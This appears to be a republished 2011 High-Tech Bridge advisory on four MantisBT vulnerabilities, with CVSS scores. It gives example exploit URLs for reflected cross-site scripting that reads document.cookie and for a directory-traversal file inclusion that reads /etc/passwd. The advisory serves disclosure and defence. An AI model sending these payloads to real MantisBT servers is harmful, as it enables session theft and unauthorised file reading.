Lucene search

K
htbridgeHigh-Tech BridgeHTB23045
HistoryAug 31, 2011 - 12:00 a.m.

Multiple Vulnerabilities in MantisBT

2011-08-3100:00:00
High-Tech Bridge
www.htbridge.com
16

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.01 Low

EPSS

Percentile

81.9%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in MantisBT which could be exploited to perform cross-site scripting attacks, gain access to sensitive information and compromise vulnerable system.

  1. Cross-site scripting (XSS) vulnerabilities in MantisBT: CVE-2011-3578
    The vulnerability exists due to input sanitation error in the “action” parameter in bug_actiongroup_ext_page.php and bug_actiongroup_page.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
    Exploitation examples:
    http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E%3Cs cript%3Ealert%28document .cookie%29;%3C/script%3E
    http://[host]/bug_actiongroup_page.php?bug_arr[]=[ ISSUE_ID]&action=EXT_%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E

  2. Cross-site scripting (XSS) vulnerabilities in MantisBT: CVE-2011-3356
    The vulnerability exists due to input sanitation error in URL in the manage_config_email_page.php and manage_config_workflow_page.php scripts. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
    Exploitation examples:
    http://[host]/manage_config_email_page.php/%22%3E%3Cimg%20src=1%20onerror=%2 2javascript:alert%28docu ment.cookie%29;%22%3E/
    http://[host]/manage_config_workflow_page.php/%22%3E %3Cimg%20src=1%20onerror=%22javascript:alert%28d ocument.cookie%29;%22%3E/

  3. Cross-site scripting (XSS) vulnerabilities in MantisBT: CVE-2011-3358
    1.3 The vulnerability exists due to input sanitation error in the “platform”, “os” and “os_build” parameters in bug_report_page.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
    Exploitation example:
    http://[host]/bug_report_page.php?platform=%22%3E%3Cscript%3Ealert%28documen t.cookie%29;%3C/script%3 E

  4. Local file inclusion in MantisBT: CVE-2011-3357
    The vulnerability exists due to insufficient sanitation if input data in the “action” parameter in bug_actiongroup_ext_page.php and bug_actiongroup_page.php. A remote attacker can include and execute arbitrary files on the target system using directory traversal sequences with NULL byte.
    Combined with the file upload functionality it is possible to upload and execute arbitrary PHP file.
    Exploitation examples:
    http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/…/…/…/ …/…/…/…/etc/passwd%0 0
    http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_/. ./…/…/…/…/…/…/etc/pas swd%00

CPENameOperatorVersion
mantisbtle1.2.7

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.01 Low

EPSS

Percentile

81.9%